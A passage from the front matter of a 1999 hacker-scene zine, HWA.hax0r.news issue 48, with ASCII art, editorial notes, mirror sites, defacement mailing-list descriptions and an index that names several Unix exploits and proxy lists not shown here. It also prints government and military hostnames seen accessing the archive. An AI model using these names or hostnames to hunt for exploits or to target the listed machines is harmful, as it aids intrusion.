[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99/2000=] Number 48 Volume 1 1999 Dec 26th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== (¯`·._(¯`·._(¯`·._(¯`·._( © xmas! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) __ ____ __ __ __ _____ ____ __ / / / / // / ____ ____ __ __ / / / /___ / < /___/ / // / __ ______ / /_/ / // /_/ __ \/ __ \/ / / / / /_/ / __ \/ // / __ / // /_/ / / /_ / / __ /__ __/ /_/ / /_/ / /_/ / / __ / /_/ / // / /_/ /__ __/ /_/ / / /_ /_/ /_/ /_/ / .___/ .___/\__, / /_/ /_/\____/_//_/\__,_/ /_/ \__, / /___/ /_/ /_/ /____/ /____/ The end is nigh!, cash in your bearer bonds! - sAs I'm waiting for a $100,206,570 credit on my Visa bill! - Ed Got plenty of ammo? did you remember to buy gun oil? - Ed (¯`·._(¯`·._(¯`·._(¯`·._( © xmas! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) OH YA, AND HAPPY NEW YEARS Coming soon! __ __ __ ___________________ _/ /______/ /_ ____ _____ ____/ / / ___/ ___/ ___/ __ `/ __/ ___/ __ \ / __ `/ __ \/ __ / (__ ) /__/ / / /_/ / /_/ /__/ / / / / /_/ / / / / /_/ / /____/\___/_/ \__,_/\__/\___/_/ /_/ \__,_/_/ /_/\__,_/ _________ (_) __/ __/ (_)___________ _____ / / / ___/ __ \/ / /_/ /_ / / ___/ ___/ / / / _ \/ / (__ ) / / / / __/ __/ / (__ |__ ) /_/ / __/_/ /____/_/ /_/_/_/ /_/ /_/____/____/\__,_/\___(_) (¯`·._(¯`·._(¯`·._(¯`·._( © w00t! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯) ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ This is #48 covering Dec 19th to Dec 26th * Also contains some older material missed from past issues over the last few weeks. ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Mailing list members: 468 Can we bump this up somewhat? spread the word! ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ | | | | ___ | |_ | |_| |/ _ \| __| | _ | (_) | |_ |_| |_|\___/ \__| _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ .gov and .mil activity cofcs71.aphis.usda.gov samds4.sam.pentagon.mil eg-016-045.eglin.af.mil pacfa.evepier.navy.mil obgate.hill.af.mil biglost.inel.gov marshall.state.gov flatline.arc.nasa.gov mars.istac.gov gateway1.osd.mil gateway3.osd.mil elan5172.cbcph.navy.mil proxy.gintic.gov.sg doegate.doe.gov sunspot.gsfc.nasa.gov gate1.mcbh.usmc.mil homer.nawcad.navy.mil maggie.nawcad.navy.mil lisa.nawcad.navy.mil msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov mc1926.mcclellan.af.mil kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good Is It Worth It Followup to see our boys keeping up with the news... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _ ___ ___ _ ___ | | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____ | |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __| | _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \ |_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _ _ _ _ _____ _ _ _ | | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___ | |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __| | _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__ |_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___| Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _____ _ _ _ | ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _ | |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` | | _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| | |_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, | |___/ A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed BTW if anyone can suggest a better editor than UEDIT for this thing send me some email i'm finding it lacking in certain areas. Must be able to produce standard ascii. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= __ __ _ | \/ (_)_ __ _ __ ___ _ __ ___ | |\/| | | '__| '__/ _ \| '__/ __| | | | | | | | | | (_) | | \__ \ |_| |_|_|_| |_| \___/|_| |___/ New mirror sites *** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW *** *** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ *** http://datatwirl.intranova.net * NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. *** Most likely to be up to date other than the main site. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ************************************************************************** "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Eris Free Net #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Socks proxies, Wingates and more from IRC4ALL.................... 04.0 .. Cyberarmy Proxies, Accounts and Wingates etc (* If available).... 05.0 .. Belgium: Security of Banksys compromised......................... 06.0 .. Public access mail servers....................................... 07.0 .. Santa Claus about to lose his domain name for nonpayment? ....... 08.0 .. Interview with NFO (Nine Forty One Group)........................ 09.0 .. The History of IRC (Internet Relay Chat)......................... 10.0 .. Pagoo Internet voice MailBox by Loophole/HHP..................... 11.0 .. Top 11 Stories of 1999 according to HNN.......................... 12.0 .. AntiVirus scanning and misused tools............................. 13.0 .. RST Sets the Record Straight .................................... 14.0 .. Russian Politician Threatens Cyber Attack ....................... 15.0 .. PCR-1000 Control Suite Released by Ghetto.org ................... 16.0 .. Nuclear Power Plant Y2K Readiness ............................... 17.0 .. New E-zines Released ............................................ 18.0 .. Digi.no publishes Script Kiddie Rant ............................ 19.0 .. w00w00 Con 1999.................................................. 20.0 .. pops.c popmail scanner by duro................................... 21.0 .. Cypherpunks meeting announcement................................. 22.0 .. Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5... 23.0 .. [ISN] Hacker Shootouts?.......................................... 24.0 .. [ISN] 21 yr old secures $53Mil for high-tech startup............. 25.0 .. [ISN] Netscape Security Flaw Revealed............................ 26.0 .. [ISN] Cyberterrorism hype........................................ 27.0 .. [ISN] The Beijing Hack Attack.................................... 28.0 .. [ISN] Most cybercrime goes unpunished............................ 29.0 .. [ISN] Jubilant Zhirinovsky wants to hack western computers....... 30.0 .. [ISN] Tribe and Trinoo, two new virulent virii................... 31.0 .. [ISN] As New Year nears, threat of Net attack program mounts..... 32.0 .. [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?).. 33.0 .. [ISN] How to report internet related crime....................... 34.0 .. [ISN] Ten risks of PKI (Public Key Infrastructure)............... 35.0 .. [ISN] Forbes says he'll ditch all crypto export controls......... 36.0 .. [ISN] Zyklon claims his crime was "no big deal" ................. 37.0 .. [ISN] Security Wire Digest Volume 1.............................. 38.0 .. mailx.c slackware 3.6 local exploit.............................. 39.0 .. cmsdex.c Solaris (2.6 / 7.0) remote exploit...................... 40.0 .. xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier........... 41.0 .. rpc.autofsd.c FreeBSD/misc remote exploit by guidob.............. 42.0 .. iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli. 43.0 .. truck.c UnixWare 7.1 local explot by Brock Tellier............... =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #HWA.hax0r.news @HWA 00.2 Sources *** ~~~~~~~~~~~ ____ / ___| ___ _ _ _ __ ___ ___ ___ \___ \ / _ \| | | | '__/ __/ _ Y __| ___) | (_) | |_| | | | (_| __|__ \ |____/ \___/ \__,_|_| \___\___|___/ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ s News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq win2kbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PLEASE if you have any changes or additions for this section please mail them to cruciphux@dok.org. Thank you. http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site http://www.hack.co.za/ Current exploits archive Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ _ / ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___ \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __| ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \ |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- defaced GM [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -- defaced alpha [web page defacement announce list] This is a low traffic mail list to announce via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI. To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + 